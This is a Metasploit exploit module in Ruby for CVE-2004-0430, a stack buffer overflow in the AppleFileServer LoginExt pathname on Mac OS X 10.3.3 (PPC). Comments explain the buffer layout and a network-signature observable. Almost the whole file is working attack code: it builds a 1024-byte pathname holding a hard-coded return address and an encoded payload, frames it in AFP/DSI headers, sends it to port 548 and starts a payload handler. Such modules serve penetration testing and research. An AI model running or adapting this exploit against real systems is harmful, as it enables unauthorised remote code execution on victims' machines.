##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Only average: the single target relies on a hard-coded stack return
  # address ('Ret' below) and, per the Description, allows one attempt.
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (CVE-2004-0430, one PPC target: Mac OS X
  # 10.3.3) and sets the default port to AFP's 548.
  #
  # @param info [Hash] metadata merged into the module definition by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AppleFileServer LoginExt PathName Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the AppleFileServer service
          on MacOS X. This vulnerability was originally reported by Atstake and
          was actually one of the few useful advisories ever published by that
          company. You only have one chance to exploit this bug.
          This particular exploit uses a stack-based return address that will
          only work under optimal conditions.
        },
        'Author' => 'hdm',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-0430'],
          [ 'OSVDB', '5762'],
          [ 'BID', '10271'],
        ],
        'Payload' => {
          # At most 512 encoded bytes; placed at offset 172 of the 1024-byte
          # pathname in #exploit, so it always fits inside that buffer
          'Space' => 512,
          # 0x00 (NUL) and 0x20 (space) must not occur in the encoded payload
          'BadChars' => "\x00\x20",
          'MinNops' => 128,
          'Compat' =>
          {
            'ConnectionType' => '+find'
          }
        },
        'Targets' => [
          # Target 0 — the only target. 'Ret' is a fixed stack address, so a
          # hit depends on the victim's exact memory layout at login time.
          [
            'Mac OS X 10.3.3',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0xf0101c0c # stack address :<
            },
          ],
        ],
        'DisclosureDate' => '2004-05-03',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Configure the default port to be AFP
    register_options(
      [
        Opt::RPORT(548),
      ]
    )
  end

  # Builds a single DSI-framed AFP login request whose pathname field is
  # oversized and sends it over the TCP connection, then runs the payload
  # handler. One request per run; there is no retry.
  #
  # @return [void]
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # 1024-byte pathname: 0xff filler, the target return address at offset
    # 168, the encoded payload from offset 172. A pathname this long is far
    # outside what a legitimate AFP client sends; the length prefix written
    # below is the observable a network signature for this request keys on.
    path = "\xff" * 1024
    path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
    path[172, payload.encoded.length] = payload.encoded

    # The AFP header (four fixed bytes; not decoded further here)
    afp = "\x3f\x00\x00\x00"

    # Add the authentication methods, each as a one-byte length followed by
    # the string itself
    ['AFP3.1', 'Cleartxt Passwrd'].each do |m|
      afp << [m.length].pack('C') + m
    end

    # Add the user type and afp path. Each field is a "\x03" type byte, a
    # 16-bit big-endian length, then the value; the user name is 9 random
    # alphanumeric characters, the path is the 1024-byte buffer built above
    afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
    afp << "\x03" + [path.length].pack('n') + path

    # Add the data stream interface header: 'CCnNNN' packs two single bytes,
    # one 16-bit and three 32-bit big-endian fields, placed in front of the
    # AFP body whose length it carries
    dsi =
      [
        0, # Flags
        2, # Command
        rand(65536), # XID — random transaction id per request
        0, # Data Offset
        afp.length, # Data Length
        0 # Reserved
      ].pack('CCnNNN') + afp

    sock.put(dsi)

    # Run the framework's payload handler before the socket is closed
    handler

    disconnect
  end
end